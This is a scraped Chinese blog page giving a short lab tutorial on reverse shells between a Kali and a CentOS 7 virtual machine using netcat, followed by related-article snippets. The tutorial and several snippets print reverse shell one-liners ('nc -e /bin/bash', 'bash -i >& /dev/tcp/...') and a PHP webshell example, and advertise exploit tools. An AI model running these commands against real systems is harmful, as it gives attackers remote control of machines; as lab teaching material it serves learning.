反弹shell

最新推荐文章于 2023-07-12 23:33:24 发布
最新推荐文章于 2023-07-12 23:33:24 发布
阅读量394 收藏 1
点赞数 2
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/muzi201/article/details/121566715
版权
本文介绍了如何在Kali Linux和CentOS 7之间建立反弹shell连接。首先,在Kali上运行nc命令监听指定端口,然后在CentOS 7上使用nc命令以-e参数指定bash,连接到Kali的IP和端口。成功连接后,Kali将显示CentoS7的命令行信息,表明反弹shell已建立。
摘要由CSDN通过智能技术生成

  反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。

先打开kali和Cenos7的控制面板

在kali上输入nc /vvp 10000  (10000为端口)找一个不被占用的端口号即可 接着在输入ifconfig查找IP地址

然后在Cenos7的控制面板输入nc -e /bin/bash 加kali的ip地址和10000端口号即可

等待kali出现Cenos7的信息

出现这样的结果后 在里面查看ip地址就已经是Cenos7的IP地址了 这样就是成功了

muzi201
关注
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
CTF--比赛题目解题思路(陇剑杯)--简单题目(萌新)
没有
09-14 4331
CTF–比赛题目解题思路(陇剑杯)–简单题目(萌新) 1.webshell(单位网站被黑客挂马,请您从流量中分析出webshell,进行回答)–黑客登录系统使用的密码是 通过得到的是hack.pcap流量包,放到wireshark中通过字符串搜索得到,password为Admin123!@# 2.日志分析分析–攻击流量,黑客往/tmp目录写入一个文件,文件名为 首先用notepad++打开,首先ctr+a全选安装下图1,2,3将url解码。 在搜索栏中搜索tmp得到下面结果:sess_car
Linux反弹shell
内心不种满鲜花就会长满杂草
04-21 4235
在渗透过程中,目标处于内网环境,或因为端口限制而我们无法直连目标机器,此时需要通过反弹shell来让目标机器主动连接我们获取一个交互式shell,以便继续深入。记录几个常用的。
linux反弹shell方法
weixin_53747497的博客
07-12 2126
被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。被控端攻击端参数解释bash -i : 打开一个交互式的bash shell/dev/tcp/IP/PORT : /dev/tcp/是Linux中的一个特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。0>&1 : 将输入重定向到标准输出,为了确保命令执行后的输入被正确的传回攻击机。
反弹shell原理和实现
u012830303的博客
01-18 3533
当一些框架和代码,不小心让可执行shell命令的函数存在注入漏洞时,会被利用注入漏洞执行一些shell命令。入侵者为了防止漏洞被修复,无法通过正向链接侵入服务器时,会被利用shell反弹原理种马。 首先,侵入者会利用注入参数,创建一个shell.php文件,文件内容如下 通过web访问并执行shell.php文件 exec('bash -i &> /dev/tcp/10.201.61.194/5566 0>&1'); 这条命令的作用是,在服务器建立一个可以与10.201.61.
反弹shell学习(一):基础反弹姿势
E1even的博客
07-25 2130
文章目录bash反弹:nc反弹:-e被阉割的情况:nc -e:利用Telnet反弹shell方法1:方法2:python脚本反弹:PHP反弹shell总结: bash反弹: 这是最常见也是最简单的一种反弹shell的方式,直接看命令: 攻击机:nc -lvp 2333 受害机:bash -i >& /dev/tcp/192.168.28.133/2333 0>&1 攻击机: 受害机: 最后攻击机达成的效果: 可以命令执行,再实际中不可能获取的是root权限,所以成功反弹s
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
反弹shell1
08-03
反弹Shell是一种黑客技术,常用于渗透测试和恶意攻击中,它允许攻击者远程控制目标系统。在这种场景下,攻击者通常在自己的机器上设置一个监听服务,然后在目标机器上执行特定的命令,使得目标机器的Shell(命令行...
Spring cloud function SpEL RCE批量检测脚本,反弹shell脚本
03-30
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和...反弹shell脚本:python Spel_RCE_Bash_EXP.py url lhost lport 受影响版本:3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
CVE-2018-3191 反弹shell
最新发布
05-18
**CVE-2018-3191:反弹Shell漏洞详解** 在信息安全领域,"反弹Shell"是一种常见的攻击手段,常被黑客用于远程控制受感染的系统。CVE-2018-3191是针对这一技术的一个具体安全漏洞实例。这个漏洞可能影响到各种软件或...
XXL-JOB反弹shell利用工具(xxl-jobExploitGUI)
11-03
工具实现了XXL-JOB默认accessToken权限绕过漏洞的单个检测、批量检测、一键反弹shell功能,后续会持续更新优化,添加POC检测等。(由于传播、利用此资源所提供的信息或者工具而造成的任何直接或者间接的后果及损失,...
Apache-flink 未授权访问任意jar包上传反弹shell.MD
04-12
Apache-flink 未授权访问任意jar包上传反弹shell
Golang反弹shell(使用邮件获取反弹地址
09-29
使用邮件地址作为反弹shell服务器地址,用于windows的反弹shell,可在编译时选择隐藏弹出窗口 This golng reverse shell fetches the address from your latest email subject, and the subject should be like ...
PHP脚本反弹SHELL
10-20
此脚本可以反弹SHELL到指定地址,得到交互交shell
如何用内网虚拟机kali实现反弹shell
qq_44657899的博客
05-23 9749
文章目录实验环境设置端口转发反弹shell验证为什么要反弹shell? 这里我讲述的是NAT模式下的反弹shell,因为个人感觉NAT模式方便一点。 实验环境 攻击机:kali虚拟机(位于内网) ip:192.168.77.128 宿主机:win10(位于外网) ip:10.8.163.224 受害端:centos-7 设置端口转发 虚拟机集群此时相当于在内网中,而要实现反弹shell,我们的受害端centos7必须要能够连接我们的虚拟机kali。可以通过端口转发的功能来实现,比如我
2021陇剑杯网络安全大赛-简单日志分析
qq_43264813的博客
09-14 1476
2021陇剑杯网络安全大赛-简单日志分析 题目描述: 某应用程序被攻击,请分析日志后作答: 解题思路: 7.1黑客攻击的参数是__user_。(如有字母请全部使用小写) 7.2黑客看的秘密文件的绝对路径是_/Th4s_IS_VERY_Import_Fi1e_。 7.3黑客反弹shell的ip和端口是__192.168.2.197:8888__。(格式使用“ip:端口",例如127.0.0.1:2333) ...
Php shell端口反弹,Linux下通过webshell反弹shell总结
weixin_33253503的博客
03-12 435
反弹shell原因:Linux提权绝大部分都靠的是Local Exploit。WebShell一般都可以执行命令,但是溢出必须在可交互环境运行,否则如果直接在WebShell执行,即使能溢出提权成功,也没法 利用。因此必须要反弹一个Shell命令行窗口,在命令行终端下执行溢出进行提权。nc命令参数:参  数:-g设置路由器跃程通信网关,最丢哦可设置8个。-G设置来源路由指向器,其数值为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值